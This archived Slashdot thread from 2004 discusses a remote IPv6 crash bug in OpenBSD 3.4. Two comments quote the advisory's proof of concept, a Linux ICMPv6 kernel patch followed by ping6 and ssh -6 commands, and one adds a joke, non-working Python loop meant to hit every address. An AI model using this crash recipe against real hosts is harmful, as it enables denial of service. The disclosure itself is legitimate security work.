Forgot your password?
typodupeerror
Security Operating Systems Bug BSD

Remotely Crash OpenBSD 407

Posted by CowboyNeal
from the even-the-best-of-us dept.
*no comment* writes "If you are running OpenBSD on your IPv6 install, it might be time to upgrade to -current. (just kidding) There is, however, a way to crash OpenBSD 3.4 with a couple of simple IPv6 commands. Georgi Guninski, found the problem. To quote Theo, 'it is just a crash.'" It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel (or rolling your own network stack) to exploit.
This discussion has been archived. No new comments can be posted.

Remotely Crash OpenBSD

Comments Filter:
  • Oh well... (Score:5, Funny)

    by Seoulstriker (748895) on Thursday February 05, 2004 @06:50PM (#8195340)
    I think it's time to upgrade to windows.
  • Does this count? (Score:5, Interesting)

    by DNAspark99 (218197) on Thursday February 05, 2004 @06:52PM (#8195365)
    Or can OpenBSD still boast "Only one remote hole in the default install, in more than 7 years!" ?
    • by inertia@yahoo.com (156602) * on Thursday February 05, 2004 @06:57PM (#8195453) Homepage Journal
      I don't think the IPv6 install is the default. Even if it is, 'it's just a crash' not a remote hole. So, yes they can still boast.
    • It's not a hole. A hole would imply gaining access. This is just a DoS attack.
    • by timeOday (582209) on Thursday February 05, 2004 @07:21PM (#8195691)
      Guess it depends on how you define "hole."

      Personally I don't like random people crashing my servers, so I'd call it a hole!

  • Double standards? (Score:5, Insightful)

    by Threni (635302) on Thursday February 05, 2004 @06:53PM (#8195377)
    I'm thinking that if someone from Microsoft stated "It's just a crash" the editors here would be just a touch more sarcastic...
    • by Anonymous Coward on Thursday February 05, 2004 @06:58PM (#8195461)
      if someone from Microsoft stated "It's just a crash"

      Yeah, but on Windows, how can you tell the difference?

      (Admit it, you asked for it)
    • "It's Just a crash" is among the dumbest things anyone could say about a bug. Not quite as bad as "It's just a remote root exploit" but very disturbing none the less. The only thing that seems to offer any reassurance is that it requires a patched kernel or custom stack to exploit but a person bent on bringing down a system *could* do these things without too much trouble I would think. My question is for a serious cracker wouldn't taking down a system in a manner like this be much more inviting if all they
      • Obviously you don't know anything ever written by Mr. de Raadt. You know, he says things you'd count as "dumb" all the time. Strange things, indeed. ;-)
        Regards
      • by billstewart (78916) on Thursday February 05, 2004 @07:27PM (#8195740) Journal
        Yes, it's disturbing, but only because it happened, not because Theo's clueless. But the point of such a comment is that "It's NOT a root exploit". By contrast, with Microsoft, major exploits happen Too Frequently and crashes happen too often to bother reporting.

        A non-serious cracker might have fun taking down OpenBSD a few times with an exploit like this. A more serious cracker would do this to try to convince some number of systems to stop running the most secure OS that's reasonably available and replace it with more vulnerable systems that aren't getting spanked a lot.

    • There are days on this network where I wish the latest MS vulnerability was just a crash. 'member those great days? It may not even get reported because it would be such low key news.

      Anyway, for this remote takedown to work, you also have to be running an IPV6 stack, right? At the moment that's a pretty small segment of techies.

      Note: I am not an OpenBSD apologist... I am a Mac apologist.
      • by Zebedeu (739988)
        Note: I am not an OpenBSD apologist... I am a Mac apologist.

        Steve?
        Now now, don't be so hard on yourself, we don't really think it's necessary to apologise :)

    • by Flower (31351) on Thursday February 05, 2004 @07:23PM (#8195712) Homepage
      Without seeing Theo's complete statement you can't tell if the statement is dismissive (something I find difficult to believe) or if it is qualifying - i.e. the exploit only produces a crash.

      Fwiw, I wouldn't go into riot mode over four monosyllable words taken out of context be it from MS or OBSD. Of course, this is /. and that nice little blurb will most certainly cause a lot of banner hits as people will just have to comment. I can personally attest to 3 to get this post up.

    • by gid13 (620803)
      If Microsoft had few enough exploits that they had a security record worth protecting by saying "it's just a crash", perhaps the editors wouldn't feel it necessary to be so sarcastic?

      Especially given that Microsoft is a company that charges for their product, where OpenBSD is free.
    • Track record (Score:5, Insightful)

      by AvantLegion (595806) on Thursday February 05, 2004 @07:50PM (#8195936) Journal
      I'm thinking that if someone from Microsoft stated "It's just a crash" the editors here would be just a touch more sarcastic...

      The day Microsoft has half the kind of security track record as OpenBSD, they'll be cut some slack.

      OpenBSD had earned a little slack. MS still has a long way to go in system security/stability before they deserve the same treatment.

    • I'm thinking that if someone from Microsoft stated "It's just a crash" the editors here would be just a touch more sarcastic...

      Yes, but Microsoft lacks credibility when it comes to security.

      If William G Gates personally presented me with a signed and notarized certificate saying "It's just a crash" I'd get still get a second opinion. After making sure I still had my wallet.

      c.
    • by spitzak (4019) on Thursday February 05, 2004 @09:44PM (#8197131) Homepage
      He IS being sarcastic. If this was a Microsoft bug and they said "It's just a crash" it surely would be quoted exactly the same way, because it is a silly statement. Let's see:

      *no comment* writes "If you are IPv6 on WinXP, it might be time to upgrade to Linux (just kidding). There is, however, a way to crash WinXP with a couple of simple IPv6 commands. Georgi Guninski, found the problem. To quote Bill Gates, 'it is just a crash.'" It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel (or rolling your own network stack) to exploit.

      Okay, now that the wording has been changed to Microsoft, doesn't it suddenly look like a typical rabid-anti-Microsoft Slashdot article? You are so blinded by the belief that everything is anti-Microsoft that you cannot even see people being sarcastic about anything not Microsoft!

  • by agentZ (210674) on Thursday February 05, 2004 @06:54PM (#8195401)
    I know that the problem has been fixed in -current, but I run a production box that I refuse to bring up to -current. There's no patch or even a mention of this problem on the errata [openbsd.org] page.

    What's a sane admin to do?
    • by Richard_at_work (517087) * <richardprice@noSPAM.gmail.com> on Thursday February 05, 2004 @07:13PM (#8195593)
      Give it a little time. THey usually patch -current first to test it out, then backport the patches to -stable. Patching -current first saves time in the long run, in cases like this where its not really a MS level issue :) IF it was more serious, -stable would get the patch first, and then it would be ported into -current.
    • by phorm (591458)
      Are you making use of IPV6? While it is possible I don't really know many people that are, so perhaps you could just not use the IPV6 bindings for now until the problem blows over?
    • by Ryvar (122400) on Thursday February 05, 2004 @07:28PM (#8195748) Homepage
      Do what I did last night before I even knew about this - comment IPV6 completely out of your kernel entirely for effiency's sake.

      One of the reasons OpenBSD tends to be more secure is because it ships with *almost* everything off. However, there's a solid 10+ default user accounts, 3-4 default services (sshd, sendmail, inetd/portmap), and 75+ kernal/device options you should remove/recompile out upon installation (this is all assuming your only purpose is to create an x86-based router).

      Yes, you'll need to muck about with /etc/mtree/special and /var/cron/tabs a bit to keep everything from whining to syslog constantly, but every unnecessary thing removed is a potential exploit avoided.

      --Ryv
  • RTFA (Score:5, Informative)

    by Anonymous Coward on Thursday February 05, 2004 @06:57PM (#8195454)
    You have to have a modified ipv6 stack in order to exploit this bug, not to fix it. I can remotely crash your ipv6 enabled openbsd if I modify my linux kernel. Capisce?
  • Slashdotted (Score:5, Informative)

    by Anonymous Coward on Thursday February 05, 2004 @06:58PM (#8195455)
    Remote openbsd crash with ip6, yet still openbsd much better than windows

    Systems affected:
    tested on openbsd 3.4
    not clear about netbsd
    freebsd not vulnerable

    Risk: Medium
    Date: 4 February 2004

    Legal Notice:
    This Advisory is Copyright (c) 2004 Georgi Guninski.
    You may distribute it unmodified.
    You may not modify it and distribute it or distribute parts
    of it without the author's written permission - this especially applies to
    so called "vulnerabilities databases" and securityfocus, microsoft, cert
    and mitre.
    If you want to link to this content use the URL:
    http://www.guninski.com/obsdmtu.html
    Anythi ng in this document may change without notice.

    Disclaimer:
    The information in this advisory is believed to be true though
    it may be false.
    The opinions expressed in this advisory and program are my own and
    not of any company. The usual standard disclaimer applies,
    especially the fact that Georgi Guninski is not liable for any damages
    caused by direct or indirect use of the information or functionality
    provided by this advisory or program. Georgi Guninski bears no
    responsibility for content or misuse of this advisory or program or
    any derivatives thereof.

    Description:
    It is possible to remotely crash openbsd 3.4 if the host receives icmpv6
    and there is a listening tcp port.
    quoting de raadt: "it is just a crash."
    remote crash which screws the kernel.
    unknown whether this may be exploited for code execution.

    Details:
    The problem is triggered by setting small ipv6 mtu and then doing tcp
    connect.
    How to reproduce:
    Patch linux kernel 2.4.24 net/ipv6/icmp.c :

    case ICMPV6_ECHO_REPLY: /* we coulnd't care less */
    icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro

    then:
    ping6 openbsd
    ssh -6 openbsd

    Workaround:
    It is believed that openbsd current is not vulnerable.
    netbsd current also seems to have related changes.
    check:
    http://www.openbsd.org/cgi-bin/cvsweb/src/sys/neti net6/ip6_output.c [openbsd.org]
    http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netine t/tcp_output.c?sortby=date [netbsd.org]

    Vendor status:
    open, net and free bsd were notified Sun, 1 Feb 2004 16:35:56 +0200

    Georgi Guninski
    http://www.guninski.com
  • by Halthar (669785) on Thursday February 05, 2004 @07:01PM (#8195485)
    Great, now when I try and check the linked article and cant get there I am left wondering if it was Slashdotted or if someone crashed the servers using the exploit.

    Hell, who knows, maybe this one is Google's fault too.

  • by Tomy (34647) on Thursday February 05, 2004 @07:02PM (#8195487)
    ...my BSD is dying...

  • by Anonymous Coward
    Now let's see ... what are the chances of finding both an OpenBSD server (an unpatched one at that) and IPv6 network in the same place? I think I'd better stick to plausible worries like lighting strikes, seatbelt failures, and choking to death on my turkey dinners.
  • by Anonymous Coward on Thursday February 05, 2004 @07:13PM (#8195596)
    Hey but is only a crash nothing at all to worry about...

    Patch linux kernel 2.4.24 net/ipv6/icmp.c :

    case ICMPV6_ECHO_REPLY: /* we coulnd't care less */
    icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro

    then:
    ping6 openbsd
    ssh -6 openbsd

    #!/usr/bin/python
    import popen2,string

    def cmd_execute(cmd):
    p = popen2.Popen3(cmd)
    p.wait()
    return string.strip(p.fromchild.read())

    #kill everybody
    for a in range(0,255):
    for b in range(0,255):
    for c in range(0,255):
    for d in range(0,255):
    execute('ping6 ' + a + '.' + b + '.' + c + '.' + d)
    execute('ssh -6 ' + a + '.' + b + '.' + c + '.' + d)
  • about ipv6 (Score:5, Interesting)

    by MrLint (519792) on Thursday February 05, 2004 @07:15PM (#8195617) Journal
    Not log ago there was an article about not only how ipv6 isnt needed, but that since its 'new' code, it has a lot of problems that have long since been worked out of ipv4. Is this an example of that? Should we worry?

    I have to ask myself that with all of the decades of experience that has gone into ipv4 development and hacking and exploiting, are these fears justified? Have all the glitches in ipv4 been found? and if so isnt it trivial to avoid the same early mistakes in ipv6. Does this particular problem have a ipv4 analog? Is it even a stack theory issue? Is it just an implementation oversight?

    Does anyone have any insight?
    • This is a problem with an IMPLEMENTATION of the IPv6 stack, so its not IPv6 thats at fault, but rather this code. There is still problems appearing today with regards to different peoples implementations of the IPv4 protocol, so I guess you cant really say theres a problem as such, since there will always be the possibility for a future implementation to fuck up badly. And suprisingly, the IPv6 implementation that MS provides for WinXP is actually a damn good one. Many people dont beleive MS can produce
    • Re:about ipv6 (Score:3, Insightful)

      by burns210 (572621)
      ipv6 is a must-upgrade solution... it IS newer code, it does get rid of NAT(which is partially used for security) and ipv4 DOES have some hacks to make it scale higher... however, once all of china connects to the net, all of india, all of everyone, there just physically isn't enough. And NAT just ins't a clean solution when used with private addressing, it works, but it is a hack to an unavoidable fix.

      ipv6 has security built into it, more addresses then particles in the universe, and eliminates the need f
  • by loconet (415875) on Thursday February 05, 2004 @07:34PM (#8195807) Homepage
    I'm glad they fixed it..

    http://www.openbsd.org/cgi-bin/cvsweb/src/sys/ne ti net6/ip6_output.c.diff?r1=1.81&r2=1.82&f=h
    http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/neti ne t/tcp_output.c.diff?r1=1.106&r2=1.107&sortby=date& f=h

  • I have made a mirror [jhu.edu] of the page, as it is becoming exceedingly slow.
  • already fixed!!! (Score:5, Informative)

    by BigBadDude (683684) on Thursday February 05, 2004 @07:41PM (#8195855)
    now, how many times does this happens to your favorite OS vendor and their favorite web browser???

    from the openbsd CVS:
    Revision 1.82 / (download) - annotate - [selected], Wed Feb 4 08:47:41 2004 UTC (38 hours, 50 minutes ago) by itojun
    Branch: MAIN
    CVS Tags: HEAD
    Changes since 1.81: +100 -18 lines
    Diff to previous 1.81 (colored)
    strictly follow RFC2460 section 5, last paragraph (sender behavior when path MTU 1280). bug found by Georgi Guninski. ok dhartmei

  • This guy found a crash in qmail [guninski.com], too. I don't think he showed it was exploitable, so he doesn't win DJB's security guarantee prize [cr.yp.to]. In fact I'm not sure DJB reacted to the news at all.
  • by ShadowRage (678728) on Thursday February 05, 2004 @08:00PM (#8196077) Homepage Journal
    "our linux crashed your openbsd!"
  • by One Louder (595430) on Thursday February 05, 2004 @08:47PM (#8196584)


    To quote Theo, 'it is just a wardrobe malfunction.'"

  • Just a crash.. (Score:5, Insightful)

    by fven (688358) on Thursday February 05, 2004 @09:37PM (#8197093)
    As a sysadmin of a college network, "just a crash" *really* helped me.

    I replaced all firewalls with OpenBSD filtering bridges. One rather persistent script kiddie (unfortuneately a legitimite $luser on the network) decided to send a few malformed packets here, there and everywhere. One of these crashed the filtering bridge at the edge of that particular subnet.

    Immediately no packets enter or leave that subnet and I get about 40 phone calls "the internet is broken / my session crashed..." and go and deal with it.

    Just a crash, saved several boxes. By contrast, accessible linux machines, privelege escalation - root exploit. All over.

    Now if only the average windows box would *only* bluescreen in response to being cracked/ infection with the latest...rather than sending mal packets everywhere. Then infection would be self limiting and the world would be a better place.

"In matters of principle, stand like a rock; in matters of taste, swim with the current." -- Thomas Jefferson

Working...